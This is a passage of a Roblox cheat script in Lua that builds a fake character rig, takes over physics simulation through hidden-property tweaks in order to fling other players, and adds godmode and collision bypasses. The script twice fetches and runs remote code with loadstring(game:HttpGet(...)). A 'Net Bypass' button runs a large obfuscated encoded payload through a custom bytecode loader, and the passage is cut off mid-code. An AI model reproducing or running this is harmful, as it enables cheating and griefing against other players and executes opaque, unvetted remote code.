pairs(OriginalRig:GetChildren()) do if v:IsA("Tool") then v.Parent = Player.Backpack table.insert(tools,v) end end wait() -- adding a wait as extra safety -- old dynvelocity, feel free to edit and use this if u want local function dynvelocity() local humrootpos = Character.HumanoidRootPart.Position local smallestmag = 22.5 for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v ~= game:GetService("Players").LocalPlayer and v.Character then local humroot = v.Character:FindFirstChild("HumanoidRootPart") or v.Character:FindFirstChild("Head") if humroot then local mag = (humroot.Position-humrootpos).magnitude if mag <= smallestmag then smallestmag = mag end end end end getgenv.Velocity = 45-smallestmag*2 for i,v in pairs(OriginalRig:GetDescendants()) do if v:IsA("BodyVelocity") then v.Velocity = Vector3.new(45-smallestmag*2,45-smallestmag*2,45-smallestmag*2) end end end -- changes velocity based on other players position to the player local OriginalVelocity = getgenv.Velocity local function dynvelocity2() local humrootpos = Character.HumanoidRootPart.Position local boolthing = false for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v ~= game:GetService("Players").LocalPlayer and v.Character then local humroot = v.Character:FindFirstChild("HumanoidRootPart") or v.Character:FindFirstChild("Head") if humroot then local mag = (humroot.Position-humrootpos).magnitude if mag <= 22.5 then --smallestmag = mag --getgenv.Velocity = OriginalVelocity Velocity = OriginalVelocity for i,v in pairs(OriginalRig:GetDescendants()) do if v:IsA("BodyVelocity") then v.Velocity = Vector3.new(OriginalVelocity,OriginalVelocity,OriginalVelocity) end end else Velocity = Vector3.new(0.01,0.01,0.01) for i,v in pairs(OriginalRig:GetDescendants()) do if v:IsA("BodyVelocity") then v.Velocity = Vector3.new(0.01,0.01,0.01) end end end end end end end local function dynvelocity3(part) local prevpos = part.Position local velstep local partvel = Vector3.new(-25.05,-25.05,-25.05) velstep = event.Event:Connect(function() if part and part.Parent then part:ApplyImpulse(partvel) --Velocity = velocity part.BodyVelocity.Velocity = partvel else velstep:Disconnect() end end) while wait(.1) and velstep do local pos = (part.Position - prevpos) if pos.Magnitude > 0.2 then partvel = pos * Vector3.new(50,50,50) else partvel = Vector3.new(-25.05,-25.05,-25.05) end prevpos = part.Position end end -- changes velocity based on player movement if getgenv.MovementVelocity then --local savedvel = getgenv.Velocity Character.Humanoid:GetPropertyChangedSignal("MoveDirection"):Connect(function() local x,y,z = Character.Humanoid.MoveDirection.X,Character.Humanoid.MoveDirection.Y,Character.Humanoid.MoveDirection.Z local vector = Vector3.new(x*OriginalVelocity,y*OriginalVelocity,z*OriginalVelocity) if vector.X == 0 and vector.Y == 0 and vector.Z == 0 then vector = Vector3.new(OriginalVelocity,OriginalVelocity,OriginalVelocity) end Velocity = vector for i,v in pairs(OriginalRig:GetDescendants()) do if v:IsA("BodyVelocity") then v.Velocity = vector end end --print(Velocity) end) end if getgenv.DynamicVelocity then RunService.Stepped:Connect(dynvelocity2) end if getgenv.Network then RunService.Stepped:Connect(function() game:GetService("Players").LocalPlayer.MaximumSimulationRadius=6969 SetHiddenProperty(game:GetService("Players").LocalPlayer,"SimulationRadius",6969) end) end if typeof(getgenv.Collisions) == "boolean" then local Collisionrig = getgenv.Collisions and OriginalRig or Character for i,v in pairs(Collisionrig:GetDescendants()) do if v:IsA("BasePart") then if getgenv.DynamicVelocityExperimental then cr(cc(function() dynvelocity3(v) end)) end local collisionstep collisionstep = RunService.Stepped:Connect(function() if v and v.Parent then v.CanCollide = false if getgenv.AllowSleep then SetHiddenProperty(v, "NetworkIsSleeping", false) end else collisionstep:Disconnect() end end) end end end -- // Claim 2 Bring back local keepingparts = true if getgenv.Claim2 then local KeepInPlace = OriginalRig.HumanoidRootPart.CFrame local frametime = tick() task.wait() frametime = tick() - frametime for i=1,1/(frametime/1) do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = KeepInPlace wait(frametime) end -- :BreakJoints breaks the neck, not good for non-godmode for i,v in pairs(OriginalRig:GetDescendants()) do cr(cc(function() if v:IsA("Motor6D") and v.Name ~= "Neck" or v:IsA("Weld") and v.Name ~= "Neck" then v:Destroy() end end)) end cr(cc(function() while keepingparts and wait() do for i,v in pairs(OriginalRig:GetDescendants()) do if v:IsA("BasePart") and v.Name ~= "Head" and v.Name ~= "HumanoidRootPart" then v.CFrame = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame end end end end)) wait(0.5) local animat = game:GetService("TweenService"):Create(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart, TweenInfo.new(5), {CFrame = Character.HumanoidRootPart.CFrame}) animat:Play() animat.Completed:wait() Character.HumanoidRootPart.Anchored = false else for i,v in pairs(OriginalRig:GetDescendants()) do cr(cc(function() if v:IsA("Motor6D") and v.Name ~= "Neck" or v:IsA("Weld") and v.Name ~= "Neck" then v:Destroy() end end)) end end --[[ -- // Weld Removing for i,v in pairs(OriginalRig:GetDescendants()) do cr(cc(function() if v:IsA("Motor6D") and v.Name ~= "Neck" then v:Destroy() end end)) end]] -- // Godmode Keep Fling Part in place if getgenv.GodMode and OriginalRig:FindFirstChild("Neck",true) then if OriginalRig:FindFirstChild(getgenv.Fling) then local savepos = OriginalRig:FindFirstChild(getgenv.Fling).CFrame cr(cc(function() while keepingparts and wait() and OriginalRig:FindFirstChild(getgenv.Fling) do OriginalRig[getgenv.Fling].CFrame = savepos end end)) end end -- // FakeGod if getgenv.FakeGod then if OriginalRig:FindFirstChild("SeeMonkey") then FakeTorso = OriginalRig.SeeMonkey.Handle Character.SeeMonkey.Handle.Transparency = 1 else FakeTorso1 = OriginalRig["Kate Hair"].Handle FakeTorso1.Mesh:Destroy(); FakeTorso = OriginalRig.Robloxclassicred.Handle Character["Kate Hair"].Handle.Transparency = 1 Character["Robloxclassicred"].Handle.Transparency = 1 end if OriginalRig:FindFirstChild("Void Head") then FakeHead = OriginalRig["Void Head"].Handle Character["Void Head"].Handle.Transparency = 1 elseif OriginalRig:FindFirstChild("Dummy_Head") then FakeHead = OriginalRig["Dummy_Head"].Handle Character["Dummy_Head"].Handle.Transparency = 1 else FakeHead = OriginalRig.MediHood.Handle Character["MediHood"].Handle.Transparency = 1 end FakeTorso.Mesh:Destroy(); end -- // Setting player onto the fake rig for i,v in pairs(tools) do if v:IsA("Tool") then v.Parent = OriginalRig end end wait() Player.Character.Parent = Character; Player.Character = Character game:GetService("Workspace").CurrentCamera.CameraSubject = Character.Humanoid notify("Set Character to Fake Rig",6) -- // Turning Chosen Rig Invisible local invisrig = getgenv.ShowReal and Character or OriginalRig for i,v in pairs(invisrig:GetChildren()) do cr(cc(function() if v:IsA("BasePart") or v:IsA("Decal") then v.Transparency = 1 elseif v:IsA("Accessory") or v:IsA("Tool") then v.Handle.Transparency = 1 end end)) end -- // Animating the fake rig if getgenv.AutoAnimate then if RigType == Enum.HumanoidRigType.R15 then cr(cc(function() --getgenv.ForHonor = Character.Animate loadstring(game:HttpGet("https://raw.githubusercontent.com/CenteredSniper/Kenzen/master/Animate"))() end)) elseif getgenv.R6toR15 then cr(cc(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/CenteredSniper/Kenzen/master/extra/R15Animate.lua",true))() end)) else Character.Animate.Disabled = true; wait() Character.Animate.Disabled = false end end -- // Making Characters not collide for i,v in pairs(Character:GetDescendants()) do cr(cc(function() if v:IsA("BasePart") then PhysicsService:SetPartCollisionGroup(v, "NoCollide") end end)) end --[[ if you're confused about the differences between runservice events refer to; https://doy2mn9upadnk.cloudfront.net/uploads/default/original/3X/2/d/2d8a74483027f44c4f05080bc9437408f461737a.png ]] if RigType == Enum.HumanoidRigType.R15 then for R6PartName,R15PartNames in pairs(R15Offsets) do for i,R15PartNameOffset in pairs(R15PartNames) do cr(cc(function() local partbeat partbeat = event.Event:Connect(function(delta) if OriginalRig:FindFirstChild(i) then if networkownership(OriginalRig[i]) then if i == getgenv.Fling then elseif i == "Head" and OriginalRig:FindFirstChild("Neck",true) then else local ExpectedPosition = Character[R6PartName].CFrame * R15PartNameOffset OriginalRig[i].CFrame = ExpectedPosition end end else partbeat:Disconnect() end end) end)) end end for i,v in pairs(OriginalRig:GetChildren()) do if v:IsA("Accessory") then local partbeat partbeat = event.Event:Connect(function(delta) if v and v.Parent and v:FindFirstChild("Handle") then if networkownership(v.Handle) then v.Handle.CFrame = v.Handle.CloneHat.Value.CFrame end else partbeat:Disconnect() end end) end end elseif getgenv.R6toR15 then for i,v in pairs(OriginalRig:GetChildren()) do if v:IsA("Accessory") then local partbeat partbeat = event.Event:Connect(function(delta) if v and v.Parent and v:FindFirstChild("Handle") then if networkownership(v.Handle) then v.Handle.CFrame = v.Handle.CloneHat.Value.CFrame end else partbeat:Disconnect() end end) end end for i,v in pairs(R15Offsets) do cr(cc(function() local partbeat partbeat = event.Event:Connect(function(delta) if OriginalRig:FindFirstChild(v[1]) and Character:FindFirstChild(v[2]) then if networkownership(OriginalRig[v[1]]) then if v[1] == "Head" and OriginalRig:FindFirstChild("Neck",true) then else OriginalRig[v[1]].CFrame = Character[v[2]].CFrame * v[3] end end else partbeat:Disconnect() end end) end)) end else for i,v in pairs(OriginalRig:GetChildren()) do cr(cc(function() if v:IsA("BasePart") then local partbeat partbeat = event.Event:Connect(function(delta) if v and v.Parent then if v.Name == getgenv.Fling and networkownership(v) then elseif getgenv.FakeGod and v.Name == "Head" and networkownership(FakeHead) then FakeHead.CFrame = Character["Head"].CFrame elseif getgenv.FakeGod and v.Name == "Torso" and networkownership(FakeTorso) then if FakeTorso1 then FakeTorso.CFrame = Character["Torso"].CFrame * CFrame.Angles(math.rad(-90),0,0) * CFrame.new(0.5,0,0) FakeTorso1.CFrame = Character["Torso"].CFrame * CFrame.Angles(math.rad(-90),0,0) * CFrame.new(-0.5,0,0) else FakeTorso.CFrame = Character["Torso"].CFrame * CFrame.Angles(math.rad(-90),0,0) end elseif networkownership(v) then v.CFrame = Character[v.Name].CFrame end else partbeat:Disconnect() end end) elseif v:IsA("Accessory") and v.Handle ~= FakeTorso and v.Handle ~= FakeTorso1 and v.Handle ~= FakeHead then local partbeat partbeat = event.Event:Connect(function(delta) if v and v.Parent and v:FindFirstChild("Handle") then if networkownership(v.Handle) then v.Handle.CFrame = v.Handle.CloneHat.Value.CFrame end else partbeat:Disconnect() end end) end end)) end end if getgenv.Tools then for i,v in pairs(tools) do local partbeat partbeat = event.Event:Connect(function(delta) if v and v.Parent and v:FindFirstChild("Handle") then if Character:FindFirstChild(v.Name) and networkownership(v.Handle) then v.Handle.CFrame = Character[v.Name].Handle.CFrame elseif networkownership(v.Handle) then v.Handle.CFrame = Character["Head"].CFrame + Vector3.new(0,-5,0) end else partbeat:Disconnect() end end) end end keepingparts = false -- // Check for death if getgenv.CheckForDeath then -- changed OriginalRig:ClearAllChildren because some games have a ac against it Character.Humanoid.Died:Connect(function() pcall(function() Player.Character = OriginalRig; OriginalRig.Parent = workspace; Character:Destroy() end) end) -- checking for resetting Player.CharacterAdded:Connect(function() Character:Destroy() end) -- checking to see if server respawned you end notify("Script loaded in " .. tostring(tick() - speedtesttick) .. " Seconds",5) -- // God Mode if getgenv.GodMode and OriginalRig:FindFirstChild("Neck",true) then wait(game:GetService("Players").RespawnTime + game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValue()/750); if OriginalRig:FindFirstChild("Neck",true) then OriginalRig:FindFirstChild("Neck",true).Parent = nil keepinplace = false notify("Permadeath On",6) end end end }) nets:AddButton({ Title = "Net Bypass", Description = "Bypass", Callback = function() return (function(net_h, net_i, net_q) local net_l = string.char local net_e = string.sub local net_m = table.concat local net_n = math.ldexp local net_s = getfenv or function() return _ENV end local net_o = select local net_g = unpack or table.unpack local net_j = tonumber local function net_k(net_h) local net_b, net_c, net_d = "", "", {} local net_f = 256 local net_g = {} for net_a = 0, net_f - 1 do net_g[net_a] = net_l(net_a) end local net_a = 1 local function net_i() local net_b = net_j(net_e(net_h, net_a, net_a), 36) net_a = net_a + 1 local net_c = net_j(net_e(net_h, net_a, net_a + net_b - 1), 36) net_a = net_a + net_b return net_c end net_b = net_l(net_i()) net_d[1] = net_b while net_a < #net_h do local net_a = net_i() if net_g[net_a] then net_c = net_g[net_a] else net_c = net_b .. net_e(net_b, 1, 1) end net_g[net_f] = net_b .. net_e(net_c, 1, 1) net_d[#net_d + 1], net_b, net_f = net_c, net_c, net_f + 1 end return table.concat(net_d) end local net_k = net_k( "25Q25Y27525W25U27525Y24X25325724Z25W26527923O24J25426U23P24Z24K24G25B25127E26327H24Z25424Y27N23P24I24Z24M24M24Z24Y25W25T27925125525425424Z25124I25W25V27924L24M25324H25425W26728825524K25524J24I25B28C25W25S28824K24Z25328025W25X28I24V28N26127924X24Z24I24K28L27D24I29325325025627E26027925725325924Z23T24H24K25B28029K29M25W26627925427C28D25325625627F2A324Z24H25125125625524L24J29128G27924M29W25428F27827524H28R25925W26N27925A24I24I24M26U28J24V26U2512532AP26U25024Z26U24Y25B24L29Z2842B624J24S26U24V28T26U24J24L2BC24L25527D2B325A29X24I2B524Z24U24M2AG29X28627923Q25625324V27N24L2AA27524A2552B72562C82CA27N28O27924525A25329F28E2CM28H27528K25B24K2CD27G27524129D2CP25B25624Y29128N29627524F24L24725W25E2792442A725623P2CH29S24I24528A24L29E25328W28F29A27524E28W29C2DQ2542DS29F2DV2C627524224Z2E425524V2872752D125Y2A128I29D28V25424X2CD2EE25Y23Q25A24V24L27Q2CD25M2C72ES2EU25124L24325427P28S25427D2AP2A723M25A28S2B02A02AR25Y2F324J25725W25P2792F32F52BU27V29I2CJ2EZ2EV2FB2FD24I2A02A22E82BF2BH2852642792472A825524H23P29M28127625H2EJ24I2EU25724J2C928V28A29F2BE2BQ27729P29325A2GR27525A24J29C27927527427525G23T27925Z2H02H02H725W25Y26U2H82EH25Y25G2752H72FG2HD25Y2H72H728H2HL2HN25Y28Z25I2H02962H72HH2H62HE2HI2HF2HL2H02HB26E2H02872A22HY27528P2H32I12G52752HQ2HM25Y27G2HY2HB2IF2HC2762HF2EG2II2HA2HG2IP2IN2HL2HB2HB2IK2752962IW2J125Y2962IR2IY2J52HE2HB2H72H82JC25Y2GF2762G025Y2BR2B02E02EO2EY2ET2EV25W2IN2G72AG2GA2GC24M2762FG27B27D2JR2792D324I27M27O27Q27E2EP2CK2CB2CZ2CE25Y2CG2CI2KB2CM2HU27523O28125627Q29325B28A2402CH2GQ2IC25Y2AT24K25928J25327R25W25J2GG2BX24Y27X2542AN25528324K2BZ25W2KK25Y23P25B2GJ2GL2KR25423O2532GP24L2JE2JD2HE21226H25W25D27924B25324U2LK2FJ2LJ2LL2KQ28A2LP2LR25W2JG2JJ29D2GI2GK2M82542GO25B2GQ2IN27I2542K627P2L32KW24E2922LE2BB2932GV2KX2DU24I2H826R27925G2DX2II2G62HZ2HB2I32792I52HV25Y2782IA25Y2CV2IO2H828Z2IL25Y2EP2H82J82NC2752I92IE2792LH25Y28P2HX2H02EG2HY2HO2792IH2H72872O725Y2NV2HF2622792I62J929O27T2H82HW2IU2792O32I12NK2OA2O92I12H72OC2HB2N72OG2962OI2HE2OL2NI2LH2OG2H72P02NR2II2NI2OQ2HE2NN2IP2L52I02NS2HE2HH2NT2JF2JA2II2FG2HZ25Y26V2PP2NP2ND2JI2JK2EL2EN2E72EQ2FU2F12K22752JT2G92GB24Z2GD2EH2MD2JK2MG2LM2GN2LQ2ML2CD2FG29Q24I2GU2FG2GX2GZ2H02PF2HG24K2PS2LU2NB2PM2OG2J42NH2H02NK2O42HS2O62OT2PT2NO28Z2IG2IP2HB2NQ2HR2HB2R82R52HF2RC2OM2962R92NL2962962NQ2J82DB2I42N82H92792N72MZ2K027E2IN2K42MQ2K82Q325Y2MO2S32MS2792MU2CR24I2MX2AQ27923L2N12EI2752PW2JM2PZ2ER2JP2Q22JS2G82JV2Q82JX2EH2QR2JK2L72L92LB2LD2LF2KA2C92KC2D02792KG2A72KI24K2LY2M02M22M42572M62MH2GM2LO2QG2BQ25Z2611Z26Q26S22G1426P24B2LG2792TI2QE2TL2LR2H82FM2H32N72JE26U22M2P82NO2RS2P82QW2H82782PK2NK2ND2P92H02RM2QV2NL2I725Y2QY2OB2NZ2OM2752IN2R32U72R627G2OA2OE2NO2OJ2RK25Y29O2I02P22H02UW2R62RA2IS2IJ2NL2HR2V22IP2N72HY2OZ2I02J92HJ2HE2JC2PR2I127526T2PU2GG2PX2JN2752SO2F02CD2SR2JU2Q72Q92RY2A52S52S227N2MR2S027H27J2S827S27U27W27Y2802822842MZ2SH2C52FG28C24U28F2T42CL2KD2EG2K42D52D72D92KE2T92CJ2T52CM2LZ2752M12M32GJ2TH2M42U02MA2QH25Z2242272XL2XL2332LX2LH2TZ2MI2XH2TN2VN2CN27528928S28U28W27E2RM2912AI2K12V424829D2KY2592472AE2EA2CD2HB27523T24129528I2LK2MC2GG2QD2MI2MK2GQ25F2GG23T2YP2TK23T2YR2VZ27A29D29C2F428Y2YO2YM2EG2JK2552QL2CC2YM2N724W28W24Y24H29X2BX2F929L27E2N729C2DT24H29H29J2ZM2KE2JK2912LQ28A25624V2YK2752552D72PZ23T23T2ZG2C12KE28C2AD2AF2AH2AJ2Y22902922942NK2L128M2RM2EG2AL2CW2CI2A92NK29I2ZU2RM28W2BR2LE25W2YG25Y2YI31022JJ2YM2JZ2W92WW2T62X42CH2TA2X72TC2X925Y2XB2TG2XR2TK2XT2LS2H824622H2462TX275311L2LN311N2JE2NK2W82K1311A2CC311C2KH311F2TD2XA2TF2XD311V2M92TM2CD2XQ2XF2XS312D2H82KW25G24R2PS2PK2UE2NF2PK2R02VE2VD2RE2VG2II2962OA2UI2VT2EH26S2H02432HF2V82RU2792PO2RT2782O12HF2JE25W26D2J92H825K2RI2HF25S2452HF2PR2JE25U23U279313Q2HG29A296311226U25N2J92RO2OM2782HK27531452NJ2R1313I2OM28Z2RM2HL314D2PT314F2R42OC287312K2NU25Y2IN27928H2A22JC24C2J928H2HX24Y2J9313Z2J431432HY31482VD31482UI28H2RS2HY314G2VD314G2OS2R428Z314K2VF2ID2US314P275314R2N8314U296314W2752VS2RU2V72EH311831212C7311F2T72D22D42BX2X227V310Q25Y2CX2WY2T8311D2X62WX25W2V42QC25129W24M310V2A0311H311J312A312G311M312D311T2LI316Q311W316S2NK24M310S3167316L310H275310Y27N28F311231142RS2GI2LT25Y311Q246313F2ND316N31292M5316V312C2MB312F2M7316R2U2314A2792U42H82PK2LT317C2OA31122PS25W2692N524L313E2RH2J82UE2RR2RT2J82VL2NG2HE27831802J42HB28H2PO26A2P929A314S2O624J2US2A22NB318R2A22A228H25S2422PT313H2OU2NG313T2753192313W2US2UM2542UT2EP2HY2G52NQ2EF3138314N27G313D2A22UM2IB2PT315J2G52JI2ON319I2US319K25Y2KK2872EP319Y2US319L2UT27525S2EX2KW2HR25Y23Z2792NQ313K318T313M313O2A231973147319525Y31972N62UT2IW23O2UT28P2J0314O25Y2OE2VD2G52G52V42VF2UC2752OE319D27527T31B62V631BA2H827G29O314T2UT319W25G25831AP2RH28P31AT2OM2G531AX2NL31AZ25Y31B127G31B331AW319P2OM27T2JI2HY29O315V319T31BE275314U31BN2JC2L5319N25S2H7296318P2HB313S279318P2PQ2PS311Z316Y2DU2KD31782YJ317A2YM310U2BH2MZ2ZF27W2I425O2N529O2JB2N5318I2RH31432UC2J831542752YT2HX29A2872HK2VV319Z314931CJ2R4312J2VN314L313M27528727T2HR31CI31B72PN31AL31DD319831DG2O622F2PT2872UI319M2HE2O02HE31DP2HB2R928731DZ31AK27931EF2562R4311231CD2HF315R31CH31AL315R25Y26F313L27931EJ2J8313U2PS2FG25W2ZE2ZG2ZI2QL2DV2BH25X317C2OB311S2RS3104314Y2ND315V25G23V31862OK2VN313C2PM318G25Y26O2IP31CG319431DL2H72BP314Z313I31EJ313Y2N5313X318E27923M31G32HE31ER2NF3130314B2I02JE31FQ2762EG24029F27D23T23P28328425Z25J31GP31GQ21Z2LX31BQ2472LE25B2ZF25125B2A724E2442SJ25Y24F2E329I2542L32RS310C316F2DI2ZG2BH24324G2FR2XW2KX2AU2L12L32FG2482W931BQ2WQ24I2KT24K2X12852NK24W31GI27E311224I24W31F9276315V2DK2G931I02A52AG24L2CD2V424I2AH24L29129Q31092TC2KW2C92DS31IB2K12FG28V2512AV2FG2402CY27E315X2WE31622K52WC2S42MN2WG31J52S92DY2MV2SD310J2PZ28928B28D28F310L24H2SI3122316A31J331HX2X331CO2CY31612KF316C2TB31HD2SK2MF316I25B316K31CW317I2XC317K317P316W317N2TY317L2U12XI2XK2XM2272XO2YN31JZ2GH31KC2YZ25W2YT31KK2YV31KC2YY316S2RM2QC31172GS2QL2MZ2QO27E2Z829D2ZA25A2ZC2FK310L28K28M2RS315V311127931I4316731IR29N27931I924H31LI31ID2CD31KV31K1316K25W31GU31GW31GY31H025631H22MZ31IY2AK31IO25331IQ31I12MZ31IU25931F92LW2MZ2QK2GU31HZ2AG28R31HK2YA31HN2WI27531IH31IE31IK2DU2WK24K31I62NR26M2N526K31FJ318B31D531MY2NO2JE318D31EL2J431FS31DV31A231FT275318331DE2HF2RS25S26Y2OD2VE31N82OE2HJ31AL2DH31ND31CH2O626Z313L2HP2RB31DM31NV313D2HB319S2IP2IT2NO2EP2PO2N42HX23Y2HF312K26Q2J92J331422VF31532RU2HY28H318H318E2782UI31G02RF314731A431G32HB313331ND28Z31BQ31FW314G2HP23L315F31DM318328Z31D425U26H2HF314131NP2US27924031862RF26P2HF319D29A2HB2V431NG2HF27331NJ31AL31PP31NM27931NH31O72HF31FG31PH31D431EG31NB318N31N126W31FX315J27831OD314831AU31G8315A3136314A318Y2H031FO318031432PO318A31N22H0315T2JE2RM31MT25X31LT2G631LV27Q31LX31LZ2NK31HH31HJ2FG31JL29X31MA31P82H62DH27526O23S313931PQ31RD2H726O31MV319O2IT31N831E931AO31CE318Q31NJ2HC31P12HR2CV31NC318631N82GF31PW2H72UM31FO2H025G31O82RL31392722II31RY3198315831RP28H318K31RR314931SE31OQ319G25Y314U28H2872HJ31P82H731DT315S2PS310P2PV2EK2SM2KA2Q12W32G62SS2W62SV312031J225Y2WB2K72L331JN31JU2X531JX2LH2KM2C32KP2TK2KT2512KV27931MJ28K2L331JK2N12H82VK2U62H02592NA2UO2UJ2UR296312S315M2RH2UL2OM2RJ2PG2I22HE2OC2H72IN2NY31RM2O22VN31DU2VQ31ST313125Y23K2N523R2UJ315J31312NI31462H828H2R32RM31O32XV2HF2NI31592NF2752UR2A22962NI2EP2PK28P2UB31V2313D31UU2VA31N031B431VK315I2VN31UT31BT31VO31VM31FG2H02NY2RV31OP2RW31VM31VC2P131U02752QR2UJ31VH2UU2PK2GF2NO31R92PM312P31EH31W225Y25C2EH313H31OK314U31O131WI2PS25G24E279311H2NI2IA2PK2742PK25R31WC2OM2H731D12P831GC31NE31G625Y24731Q32PD2IG318R314G31WW31XC2R42FM25S244314926B2II28Z31N831XL31PT2Q431X925Y2EX2792702PT2R2314N314131DN31F928Z31UH2R431XU2UP31XY2US313K31Y12PC2UT2H72OG28H314125L2UQ31U5313K2OE31EM2H726X2II31EP27931YP31ND31FV279313N2II2412RU31N831YZ31XQ25Y31WQ31YU31CL2U52HF31332H324Z2J92VV2VD314331OB31OG31ZE2NL314831OB2UJ31FM2NO2N4315J29631YI31Q731BX2P831ZO2IP31GE31WN31G027931832J82VR2PS2MD31H42SL2EM2Z02W12JQ2W42Q62JW2JY29B2W92S129D2WH2SN31603124311E316E31TG2KN31TJ2LN31TL31TN2AS31HM31TQ27E2SX29D2SZ27V2T131763101317O2TJ31K92XI31UJ2LV2LX31K5311K31KC311N31KJ2ME31KL31K82QF2MB31J72MP31J927E2MT31JC2SE2MZ31R42N22H031ZQ319831UN31X82I131WD2IP31U2318E2PA31U631YW31U831BY2UD31WF31UD31AV27531UG2UK319T315J2O5312U2II315E2HR2OV31ZV31YJ2OH31VQ31FK31W62OO2II2PB2VE322R2II322T2OX2J42P72NF31W62P42I1323931W52UU31DK31WF31XA2HB31W431MZ2PK2PJ2HE2MD323F313A2N831QP2H023P31G12QU31PE32252HC318R2RT26E25A27931U33222323H26U2282NM322D31SK31NV2PK2A231VD2PM31W62VB32312RH2HR31XA2J631UL31G02V131VW2HF2PO31PA31SB32492OE31SI31XA2872IR31U52872UE31SI27T2R92782FM2O531N8325C31NA25Y324X3244318E29O29A325J2782HU31CB2JE31SA31YR27531SA31AO31UT26U26J2H831W92I131WB2P831W631KP2RV31VU2H031WH31W6311H2UM31XW313R31AL326E325G27131Q32H1323X2H731WY31PD2VE31EC2EX311231A931AB2HE25I31YT25Y31D12RF29A326N2H031PE312V313G31MY326X2II2FM32712II326O275327531YQ31WN31EX319X23W2II326S31X0325H31N0318J31UL318C2IP31YA323A318F31V231FM2IX2II2HD2NO31ZT322D315T32773143279313K3188319X326Y2HD327C31VX3241313L3133328731X624S313L31VX31VA31D72J9323Q31S22NF31D4318D31ZJ327731OM2H0318331G031CA2I031N831FM31Z731Z02ND2QR2ZP2A427D310S29H25A2552852EP2K424E2B024M317131CW2RM27J31TQ31TY2H62IA25G22931MY323F31QJ31FL2VN2RS31RG31RC31NZ327H31N8318P31RL323T2QU31XN2PI323H315J28Z2RS314I32AD31AC31GB31A5322E31OQ329431VR313R329929B29D329C2A62A8329F329H2WA29D24925025831JI2CD31CV310W279329R2L2329T2HI2QR329W329Y31WM32A032AQ31372I131RH2HF31N731AL31CK323U322C323S2HH313031QD32AI32AN32AK31DR32AM2R431SK323S32AP321D2SG323X313131FW2RT32CB324631SG31QH327I2HE31WL3186325W323H327731A9314N31WM2NI2UY2P82PK312Y327X3277327J31SL323F32CL314E324232AL32CN31GB327V318C327231NW31FW2HR325631WJ31X6313K2IT328F31PC2HS31NH2HB325F31Z3325F31N831MV31PB312K2522VO31WZ328O322I32CG31OK32922RN2IQ3144322U31A631SH312T326V31GB323W31QI319X2IP27G312S278314M314931F932EC31OI32DY32BT31G731862HL31SF31AU31OW31YW2EX28728Z326U314Q2H02YT31P52HF2KK27827G31XA28Z2V42HY28731C432AN31Q02IP32CG27926L31Q331PL2N531S525Y2N725Y320332CK31PK2RU26U31OO32ED3280323K2NL327T318D32CS31432HU2HL31432L532G62J92HH31OG2MD32ER2J9326331QG27922E31G631XN31AL31G531FV31P128P2A22YT31S42VF31WH32AL31BN31EC31NH28P31AR31DU31AL32H131SG32GQ25Y32GS31O827G311H2PT32GX2HS313O28P32GN313932GM328132GP2US2H2318328P31D431EM27831Z5324V31AL32HT32972JE" ) local net_a = (bit or bit32) local net_d = net_a and net_a.bxor or function(net_a, net_c) local net_b, net_d, net_e = 1, 0, 10 while net_a > 0 and net_c > 0 do local net_f, net_e = net_a % 2, net_c % 2 if net_f ~= net_e then net_d = net_d + net_b end net_a, net_c, net_b = (net_a - net_f) / 2, (net_c - net_e) / 2, net_b * 2 end if net_a < net_c then net_a = net_c end while net_a > 0 do local net_c = net_a % 2 if net_c > 0 then net_d = net_d + net_b end net_a, net_b = (net_a - net_c) / 2, net_b * 2 end return net_d end local function net_c(net_c, net_a, net_b) if net_b then local net_a = (net_c / 2 ^ (net_a - 1)) % 2 ^ ((net_b - 1) - (net_a - 1) + 1) return net_a - net_a % 1 else local net_a = 2 ^ (net_a - 1) return (net_c % (net_a + net_a) >= net_a) and 1 or 0 end end local net_a = 1 local function net_b() local net_b, net_e, net_c, net_f = net_h(net_k, net_a, net_a + 3) net_b = net_d(net_b, 214) net_e = net_d(net_e, 214) net_c = net_d(net_c, 214) net_f = net_d(net_f, 214) net_a = net_a + 4 return (net_f * 16777216) + (net_c * 65536) + (net_e * 256) + net_b end local function net_j() local net_b = net_d(net_h(net_k, net_a, net_a), 214) net_a = net_a + 1 return net_b end local function net_f() local net_b, net_c = net_h(net_k, net_a, net_a + 2) net_b = net_d(net_b, 214) net_c = net_d(net_c, 214) net_a = net_a + 2 return (net_c * 256) + net_b end local function net_p() local net_a = net_b() local net_b = net_b() local net_e = 1 local net_d = (net_c(net_b, 1, 20) * (2 ^ 32)) + net_a local net_a = net_c(net_b, 21, 31) local net_b = ((-1) ^ net_c(net_b, 32)) if (net_a == 0) then if (net_d == 0) then return net_b * 0 else net_a = 1 net_e = 0 end elseif (net_a == 2047) then return (net_d == 0) and (net_b * (1 / 0)) or (net_b * (0 / 0)) end return net_n(net_b, net_a - 1023) * (net_e + (net_d / (2 ^ 52))) end local net_n = net_b local function net_r(net_b) local net_c if (not net_b) then net_b = net_n() if (net_b == 0) then return "" end end net_c = net_e(net_k, net_a, net_a + net_b - 1) net_a = net_a + net_b local net_b = {} for net_a = 1, #net_c do net_b[net_a] = net_l(net_d(net_h(net_e(net_c, net_a, net_a)), 214)) end return net_m(net_b) end local net_a = net_b local function net_n(...) return {...}, net_o("#", ...) end local function net_l() local net_h = {} local net_e = {} local net_a = {} local net_i = { [#{"1 + 1 = 111", "1 + 1 = 111"}] = net_e, [#{{632, 797, 65, 894}, "1 + 1 = 111", {264, 651, 9, 983}}] = nil, [#{"1 + 1 = 111", "1 + 1 = 111", {531, 847, 849, 955}, "1 + 1 = 111"}] = net_a, [#{{733, 101, 560, 930}}] = net_h } local net_a = net_b() local net_d = {} for net_c = 1, net_a do local net_b = net_j() local net_a if (net_b == 0) then net_a = (net_j() ~= 0) elseif (net_b == 1) then net_a = net_p() elseif (net_b == 2) then net_a = net_r() end net_d[net_c] = net_a end for net_a = 1, net_b() do net_e[net_a - 1] = net_l() end net_i[3] = net_j() for net_i = 1, net_b() do local net_a = net_j() if (net_c(net_a, 1, 1) == 0) then local net_e = net_c(net_a, 2, 3) local net_g = net_c(net_a, 4, 6) local net_a = {net_f(), net_f(), nil, nil} if (net_e == 0) then net_a[3] = net_f() net_a[4] = net_f() elseif (net_e == 1) then net_a[3] = net_b() elseif (net_e == 2) then net_a[3] = net_b() - (2 ^ 